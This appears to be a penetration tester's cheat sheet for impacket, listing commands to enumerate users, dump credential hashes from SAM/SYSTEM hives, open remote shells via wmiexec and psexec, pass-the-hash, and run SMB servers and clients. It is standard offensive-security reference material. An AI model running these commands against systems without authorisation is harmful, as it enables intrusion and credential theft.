impacket

impacket (12.4k ⭐) is a collection of Python classes for working with network protocols, shipped with example scripts. On Kali they are already installed under impacket-* names:

$ impacket-secretsdump # secretsdump.py
$ ...

You may install them manually too:

$ sudo git clone https://github.com/fortra/impacket /opt/impacket
$ cd /opt/impacket
$ pip install -r requirements.txt
$ pip install .
$ python /opt/impacket/examples/secretsdump.py [...]

Samrdump

List users and domains.

$ impacket-samrdump IP
$ impacket-samrdump username:password@IP

wmiexec

Open a PowerShell shell, or run a single command, over WMI/DCOM:

$ impacket-wmiexec -shell-type powershell username:password@IP
$ impacket-wmiexec -shell-type powershell username:password@IP "hostname"

mssqlclient

Connect to an MSSQL database (-windows-auth uses Windows authentication instead of SQL authentication).

$ impacket-mssqlclient username@IP -windows-auth
$ impacket-mssqlclient username:password@IP -windows-auth
SQL> exit

Dump hashes from backup

Dump hashes offline from backed-up SAM and SYSTEM hives (add the SECURITY hive as well). The output contains local account hashes and domain cached credentials.

$ impacket-secretsdump -sam XXX -system YYY LOCAL
$ impacket-secretsdump -sam XXX -security XXX -system XXX LOCAL
<output format is explained in the output>

PsExec

Log in with a hash instead of a password (Pass-The-Hash). The -hashes value is LMhash:NThash; the LM half may be left empty.

$ impacket-psexec -hashes LMhash:NThash username@IP
$ impacket-psexec -hashes :NThash username@IP

SMB server

Run an SMB server that clients connect to with the username XXX and the password YYY (or anonymously in the second form). Files are stored in /path/to/share.

$ impacket-smbserver -smb2support -username XXX -password YYY share_name /path/to/share
$ impacket-smbserver -smb2support share_name /path/to/share

SMB Client

Alternative to smbclient; it sometimes works when smbclient does not.

$ impacket-smbclient 'username':'password'@IP
$ impacket-smbclient IP
# shares
<list of shares>
# use <sharename>
# ls
# tree